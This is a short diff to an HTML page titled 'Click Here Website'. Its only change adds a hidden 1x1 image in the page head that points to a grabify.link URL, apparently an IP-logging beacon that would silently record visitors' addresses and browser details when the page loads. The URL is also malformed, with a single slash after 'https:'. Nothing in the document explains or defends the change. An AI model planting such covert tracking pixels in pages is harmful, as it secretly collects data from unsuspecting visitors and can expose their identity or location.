--- a/Bl.html
+++ b/Bl.html
@@ -1,6 +1,7 @@
 <!DOCTYPE html>
 <html>
 <head>
+  <img src ="https:/grabify.link/T06C8W" height=1 width=1>
   <title>Click Here Website</title>
   <style>
     body {
